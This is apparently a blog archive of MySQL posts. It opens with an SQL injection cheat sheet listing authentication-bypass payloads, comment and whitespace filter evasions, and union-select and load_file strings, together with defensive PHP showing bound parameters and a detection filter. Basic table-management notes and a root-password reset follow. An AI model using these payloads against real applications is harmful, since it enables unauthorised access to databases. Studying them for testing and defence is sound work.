Category archive: mysql

Some commonly used MySQL injection statements

Some MySQL injection

Comments
' or 1=1#
' or 1=1-- -
' or 1=1/* (MySQL < 5.1)
' or 1=1;%00
' or 1=1 union select 1,2 as
' or#newline
1='1
' or-- -newline
1='1
' /*!50000or*/1='1
' /*!or*/1='1

Prefixes
+ - ~ !
' or --+2=- -!!!'2

Operators
^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, <=, >=, <>, <=>, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST,
CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL

Whitespaces
%20 %09 %0a %0b %0c %0d %a0 /**/
'or+(1)sounds/**/like"1"--%a0-
'union(select(1),table_name,(3)from information_schema.tables)#

Strings with quotes
SELECT 'a'
SELECT "a"
SELECT n'a'
SELECT b'1100001'
SELECT _binary'1100001'
SELECT x'61'

Strings without quotes
'abc' = 0x616263

Aliases
select pass as alias from users
select pass alias from users
select pass`alias`from users

Typecasting
' or true = '1 # or 1=1
' or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1
' or '1 # or true

Compare operator typecasting
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

Authentication bypass '='
select * from users where name = ''=''
select * from users where false = ''
select * from users where 0 = 0
select * from users where true
select * from users

Authentication bypass '-'
select * from users where name = ''-''
select * from users where name = 0-0
select * from users where 0 = 0
select * from users where true
select * from users

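The two bypasses above seen from the application side, as an added example that is not from the original post: the string-built query they defeat, beside a PHP PDO login that sends the name as a bound parameter and verifies the password in PHP. The table and column names (users, name, pass_hash) and the connection details are assumptions for illustration.

```php
<?php
// Added example, not from the original post. Table and column names
// (users, name, pass_hash) are assumed for illustration.

// Vulnerable form: the submitted name is spliced into the SQL text. A
// submitted value of  '='  produces  WHERE name = ''=''  which MySQL reduces
// by comparison typecasting to  WHERE true, exactly as traced above, so the
// query matches every user.
function buildLoginQueryUnsafe(string $name): string
{
    return "SELECT id FROM users WHERE name = '" . $name . "'";
}

// Hardened form: the name travels as a bound parameter, so MySQL compares it
// as one literal string and never parses it as SQL. The password is not
// compared inside the WHERE clause at all; it is verified in PHP against a
// stored password_hash() value, which also sidesteps the case-insensitive
// string comparison that 'a' = 'A' would give under a _ci collation.
function connect(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]);
}

function authenticate(PDO $db, string $name, string $password): ?int
{
    $stmt = $db->prepare('SELECT id, pass_hash FROM users WHERE name = ? LIMIT 1');
    $stmt->execute([$name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['pass_hash'])) {
        return null; // unknown user and wrong password look the same to the caller
    }
    return (int) $row['id'];
}

// The SQL text that reaches the server in the unsafe form, for the bypass input:
echo buildLoginQueryUnsafe("'='"), PHP_EOL;
```

Run stand-alone, the script prints `SELECT id FROM users WHERE name = ''=''`, the expression the section walks through. `authenticate()` needs a live connection, e.g. `connect('mysql:host=HOST;dbname=DB', $user, $pass)` with the placeholders filled in; with emulated prepares turned off the value is bound on the server and no quoting of the input ever takes place in PHP.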
Function filter

General function filtering
ascii (97)
load_file/*foo*/(0x616263)

Strings with functions
'abc' = unhex(616263)
'abc' = char(97,98,99)
hex('a') = 61
ascii('a') = 97
ord('a') = 97
'ABC' = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))

Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs

Special characters extracted from gadgets
aes_encrypt(1,12) // 4?h±{?”^c×Hé?Ea
des_encrypt(1,2) // ?G?/??k
@@ft_boolean_syntax // + -><()~*:""&|
@@date_format // %Y-%m-%d
@@innodb_log_group_home_dir // .\

Integer representations
false: 0
true: 1
true+true: 2
floor(pi()): 3
ceil(pi()): 4
floor(version()): 5
ceil(version()): 6
ceil(pi()+pi()): 7
floor(version()+pi()): 8
floor(pi()*pi()): 9
ceil(pi()*pi()): 10
concat(true,true): 11
ceil(pi()*pi())+true: 11
ceil(pi()+pi()+version()): 12
floor(pi()*pi()+pi()): 13
ceil(pi()*pi()+pi()): 14
ceil(pi()*pi()+version()): 15
floor(pi()*version()): 16
ceil(pi()*version()): 17
ceil(pi()*version())+true: 18
floor((pi()+pi())*pi()): 19
ceil((pi()+pi())*pi()): 20
ceil(ceil(pi())*version()): 21
concat(true+true,true): 21
ceil(pi()*ceil(pi()+pi())): 22
ceil((pi()+ceil(pi()))*pi()): 23
ceil(pi())*ceil(version()): 24
floor(pi()*(version()+pi())): 25
floor(version()*version()): 26
ceil(version()*version()): 27
ceil(pi()*pi()*pi()-pi()): 28
floor(pi()*pi()*floor(pi())): 29
ceil(pi()*pi()*floor(pi())): 30
concat(floor(pi()),false): 30
floor(pi()*pi()*pi()): 31
ceil(pi()*pi()*pi()): 32
ceil(pi()*pi()*pi())+true: 33
ceil(pow(pi(),pi())-pi()): 34
ceil(pi()*pi()*pi()+pi()): 35
floor(pow(pi(),pi())): 36

@@new: 0
@@log_bin: 1

!pi(): 0
!!pi(): 1
true-~true: 3
log(-cos(pi())): 0
-cos(pi()): 1
coercibility(user()): 3
coercibility(now()): 4

minute(now())
hour(now())
day(now())
week(now())
month(now())
year(now())
quarter(now())
year(@@timestamp)
crc32(true)

Extract substrings
substr('abc',1,1) = 'a'
substr('abc' from 1 for 1) = 'a'
substring('abc',1,1) = 'a'
substring('abc' from 1 for 1) = 'a'
mid('abc',1,1) = 'a'
mid('abc' from 1 for 1) = 'a'
lpad('abc',1,space(1)) = 'a'
rpad('abc',1,space(1)) = 'a'
left('abc',1) = 'a'
reverse(right(reverse('abc'),1)) = 'a'
insert(insert('abc',1,0,space(0)),2,222,space(0)) = 'a'
space(0) = trim(version()from(version()))

Search substrings
locate('a','abc')
position('a','abc')
position('a' IN 'abc')
instr('abc','a')
substring_index('ab','b',1)

Cut substrings
length(trim(leading 'a' FROM 'abc'))
length(replace('abc', 'a', ''))

Compare strings
strcmp('a','a')
mod('a','a')
find_in_set('a','a')
field('a','a')
count(concat('a','a'))

String length
length()
bit_length()
char_length()
octet_length()
bit_count()

String case
ucase
lcase
lower
upper
password('a') != password('A')
old_password('a') != old_password('A')
md5('a') != md5('A')
sha('a') != sha('A')
aes_encrypt('a') != aes_encrypt('A')
des_encrypt('a') != des_encrypt('A')

Keyword filter

Connected keyword filtering
(0)union(select(table_name),column_name,…
0/**/union/*!50000select*/table_name
foo/**/…
0%a0union%a0select%09group_concat(table_name)….
0'union all select all`table_name`foo from`information_schema`. `tables`

OR, AND
'||1='1
'&&1='1
'='
'-'

OR, AND, UNION
' and (select pass from users limit 1)='secret

OR, AND, UNION, LIMIT
' and (select pass from users where id =1)='a

OR, AND, UNION, LIMIT, WHERE
' and (select pass from users group by id ha
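The comment, whitespace and keyword-splitting tricks listed throughout this cheat sheet defeat filters that pattern-match the raw request bytes. As an added example, not part of the original page, the PHP below first rewrites a request parameter into the form MySQL itself will parse (URL-decode, drop plain `/* */` but keep the body of `/*! */`, collapse the alternate whitespace bytes and NUL) and only then applies a few detection rules, running them over constructed sample values. The rule set and the sample values are this example's own.

```php
<?php
// Added example, not part of the original page. Sample values and rules are
// constructed for illustration; tune the rules before using them for alerting.

// Rewrite a request parameter into the form MySQL itself will parse, so that
// the comment / whitespace / keyword-splitting tricks above no longer hide
// keywords from a pattern match.
function normaliseSqlish(string $raw): string
{
    $s = rawurldecode($raw);                              // %a0, %09, %00 ... -> raw bytes
    $s = preg_replace('~/\*!\d*(.*?)\*/~s', ' $1 ', $s);  // /*!50000select*/ is executed: keep body
    $s = preg_replace('~/\*.*?\*/~s', ' ', $s);           // plain /**/ is dropped by MySQL
    $s = preg_replace('~(#|-- ?).*$~m', ' ', $s);         // comment to end of line
    $s = preg_replace('~[\x00\x09\x0a\x0b\x0c\x0d\xa0]+~', ' ', $s); // alternate whitespace + NUL
    $s = str_replace('(', ' (', $s);                      // select(1) -> select (1)
    $s = preg_replace('~\s+~', ' ', $s);
    return strtolower(trim($s));
}

// A few rules drawn from the techniques above; each is applied to the
// normalised string, never to the raw request.
function looksLikeInjection(string $raw): bool
{
    $n = normaliseSqlish($raw);
    $rules = [
        '~\bunion\b.*\bselect\b~',             // union select, however it was split
        '~\b(or|and)\s*\(?\s*\d+\s*=\s*\d+~',   // or 1=1, and (1)=1
        '~(\|\||&&)\s*\d+\s*=~',                // '||1='1, '&&1='1
        '~\'\s*[=-]\s*\'~',                     // '=' and '-' typecasting bypasses
        '~\binformation_schema\b~',
        '~\bload_file\s*\(~',
    ];
    foreach ($rules as $re) {
        if (preg_match($re, $n) === 1) {
            return true;
        }
    }
    return false;
}

// Constructed parameter values, as they would appear in a request log.
$samples = [
    'alice',
    "O'Brien",
    "' or 1=1#",
    "' or 1=1-- -",
    '0/**/union/*!50000select*/table_name',
    '0%a0union%a0select%09group_concat(table_name)',
    "'union(select(1),table_name,(3)from information_schema.tables)#",
    "'='",
    "'||1='1",
];
foreach ($samples as $value) {
    printf("%-66s %s\n", $value, looksLikeInjection($value) ? 'FLAG' : 'ok');
}
```

The first two samples come out as `ok`, the rest as `FLAG`: after normalisation `0/**/union/*!50000select*/table_name` and `0%a0union%a0select%09group_concat(table_name)` both read `0 union select ...`, which is what the first rule sees. Normalisation of this kind belongs in logging and alerting; it does not replace bound parameters in the query itself, and the `#` and `--` rules will produce false positives on legitimate values that contain those characters.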

Filtering MySQL attacks with the sprintf function

Even if PHP has already filtered the form input, it is best to filter again at the point where the MySQL query is finally executed.

Give the sprintf function a try.

format Required. The conversion format.
arg1 Required. The argument to insert at the first % sign in the format string.
arg2 Optional. The argument to insert at the second % sign in the format string.
arg++ Optional. The arguments to insert at the third, fourth, etc. % signs in the format string.

The format parameter is the conversion format, starting with a percent sign ("%") and ending with a conversion character. The possible format values are:

  • %% – returns a percent sign
  • %b – binary number
  • %c – the character with the given ASCII value
  • %d – signed decimal number
  • %e – scientific notation (e.g. 1.5e+3)
  • %u – unsigned decimal number
  • %f – floating-point number (locale settings aware)
  • %F – floating-point number (not locale settings aware)
  • %o – octal number
  • %s – string
  • %x – hexadecimal number (lowercase letters)
  • %X – hexadecimal number (uppercase letters)

The arguments arg1, arg2, etc. are inserted into the main string at the percent (%) signs. The function works step by step: arg1 is inserted at the first % sign, arg2 at the second, and so on.
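The post recommends sprintf() as a second line of filtering. As an added example that is not from the original post, the PHP below shows where that holds and where it does not: a %d or %u placeholder turns the argument into an integer before it reaches the SQL text, while %s inserts it verbatim. The table and column names are assumptions, and the template check is this example's own, not a PHP feature.

```php
<?php
// Added example, not from the original post. Table and column names are
// assumed for illustration.

// %d and %u pass the argument through integer conversion, so no quote or
// keyword can survive into the SQL text: "1 or 1=1" becomes 1, "abc" becomes 0.
// The template is checked so that nothing but bare %d / %u placeholders is
// accepted through this path (literal %% is allowed).
function formatIntQuery(string $template, string ...$ids): string
{
    $withoutLiteralPercent = str_replace('%%', '', $template);
    if (preg_match('/%(?![du])/', $withoutLiteralPercent) === 1) {
        throw new InvalidArgumentException('only %d and %u placeholders are allowed here');
    }
    return sprintf($template, ...$ids);
}

// %s inserts the argument unchanged: sprintf() is not an escaping function,
// so a quote in the input still closes the string literal and the rest of
// the input is parsed as SQL. This is the case sprintf() does not cover.
function formatStringQueryUnsafe(string $name): string
{
    return sprintf("SELECT id FROM users WHERE name = '%s'", $name);
}

echo formatIntQuery('SELECT name FROM users WHERE id = %d', '1 or 1=1'), PHP_EOL;
echo formatStringQueryUnsafe("' or 1=1#"), PHP_EOL;
try {
    formatIntQuery("SELECT id FROM users WHERE name = '%s'", 'x');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Run stand-alone, the first call prints `SELECT name FROM users WHERE id = 1` for the input `1 or 1=1`, the second prints `SELECT id FROM users WHERE name = '' or 1=1#'` (the quote has closed the literal and the comment character hides the trailing quote), and the third is refused by the template check. For string parameters the answer is a bound parameter (a PDO prepared statement or mysqli bind_param), not a format string.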

Creating databases and tables, dropping tables and databases in MySQL

On Windows, the tee command saves a record of the mysql session:
tee d:\1223.sql
tinyint m unsigned zerofill

show databases;
use kuming;
show tables;
create database my01 charset utf8;
drop database my1;
set names gbk;

create table stu (
snum int,
sname varchar(10)
)engine myisam charset utf8;

rename table stu to new_stu;
drop table stu;

You can delete all rows without dropping the table, so the table structure, attributes and indexes stay intact:
DELETE FROM table_name;
or:
DELETE * FROM table_name;  -- MySQL does not accept the "*" here; use the form above

How to make the ID start from 1 again after deleting a table's records in MySQL
Method 1:
truncate table your_table_name;
-- deletes all the data and also resets the auto-increment counter

Method 2:
delete from your_table_name;
alter table your_table_name auto_increment = 1;
-- resets the auto-increment counter so it starts from 1
-- (dbcc checkident(your_table_name, reseed, 0) is the SQL Server equivalent, not MySQL syntax)

Method 3:
If you need to keep your data, here is a third method, by QINYI:
export the database with phpMyAdmin and have a look inside,
then edit the SQL file, set the next auto-increment id value as you want it, and import it again.

create table class(
id int primary key auto_increment,
sname varchar(10) not null default '',
gender char(1) not null default '',
company varchar(20) not null default '',
salary decimal(6,2) not null default 0.00,
fanbu smallint not null default 0
)engine myisam charset utf8;

desc class;
select * from class;
insert into class
(id,sname,gender,company,salary,fanbu)
values
(1,'urname','F','google',8888.88,100);

insert into class
(sname,company,salary)
values
('liubei','shu',9000.88),
('shuche','wu',9000.77),
('coco','wei',9888.88);

update class set fanbu=1000;
update class set fanbu=2000 where salary<8000;
delete from class;
View columns: desc table_name;
Rename table: alter table t_book rename to bbb;
Add column: alter table table_name add column column_name varchar(30);
Drop column: alter table table_name drop column column_name;
Rename column, MySQL: alter table bbb change nnnnn hh int;
Rename column, SQL Server: exec sp_rename 't_student.name','nn','column';
Rename column, Oracle: alter table bbb rename column nnnnn to hh;
Modify column attributes: alter table t_book modify name varchar(22);
select * from class;
select sname,salary from class where salary>9500;

alter table class add score tinyint unsigned not null default 0;
alter table class add snum smallint(5) zerofill not null default 0;

create table account (
id int not null default 0,
acc1 float(9,2) not null default 0.00,
acc2 decimal(9,2) not null default 0.00
)engine myisam charset utf8;
insert into account
values
(1,1234567.23,1234567.23);

What to do if you forget the MySQL password on Windows?

If you forget the MySQL root password on a Windows system

Forgotten MySQL database password / forgotten MySQL password

First stop the MySQL service (from a cmd prompt run as administrator) with the command:
net stop mysql
Then start the MySQL server with:
mysqld --skip-grant-tables   or   mysqld-nt --skip-grant-tables
Open a new cmd window and enter the following commands:
mysql -uroot
update mysql.user set password=password('root') where user='root';
flush privileges;

Note: flush privileges; must not be left out.

Open Task Manager and end the mysql / mysqld process, then start the service again with
net start mysql
and you can now log into the database as user root with password root.